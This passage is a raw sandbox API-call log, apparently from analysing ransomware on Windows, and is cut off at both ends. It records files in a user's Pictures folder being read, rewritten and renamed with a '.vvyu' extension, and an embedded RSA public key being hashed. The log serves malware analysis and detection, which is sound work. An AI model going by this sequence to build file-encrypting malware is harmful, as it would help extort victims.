Size=0x10) returned 0x2d39718 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39748 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39760 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39748 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396b8 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39700 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38b08 | out: hHeap=0x6a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.256] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x507e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x507e, lpOverlapped=0x0) returned 1 [0187.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.256] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5083, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.256] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.258] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.258] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.258] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.258] CloseHandle (hObject=0x584) returned 1 [0187.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.260] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\141isvJREPi.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\141isvjrepi.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\141isvJREPi.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\141isvjrepi.gif.vvyu")) returned 1 [0187.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.262] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.265] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x889c5f50, ftCreationTime.dwHighDateTime=0x1d8a173, ftLastAccessTime.dwLowDateTime=0x62799ba0, ftLastAccessTime.dwHighDateTime=0x1d8a2ca, ftLastWriteTime.dwLowDateTime=0x62799ba0, ftLastWriteTime.dwHighDateTime=0x1d8a2ca, nFileSizeHigh=0x0, nFileSizeLow=0x1513f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8jMjrpIb7p7V7JGa.png", cAlternateFileName="8JMJRP~1.PNG")) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b08 [0187.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0187.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38b08 | out: hHeap=0x6a0000) returned 1 [0187.266] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\8jMjrpIb7p7V7JGa.png") returned=".png" [0187.266] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\8jMjrpIb7p7V7JGa.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\8jmjrpib7p7v7jga.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.266] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=86335) returned 1 [0187.266] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.269] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15119, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.269] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.271] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.271] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1513f, lpOverlapped=0x0) returned 1 [0187.272] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.272] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.272] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.272] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.273] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.273] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.273] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.273] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.274] GetLastError () returned 0x0 [0187.274] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.274] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.274] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.274] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.274] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15140) returned 0x2d43778 [0187.275] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b08 [0187.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0187.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b50 [0187.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39700 [0187.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39748 [0187.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.276] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39748 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d396e8 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.279] GetCurrentThreadId () returned 0x264 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37a38 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.279] GetCurrentThreadId () returned 0x264 [0187.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.281] RtlAllocateHeap 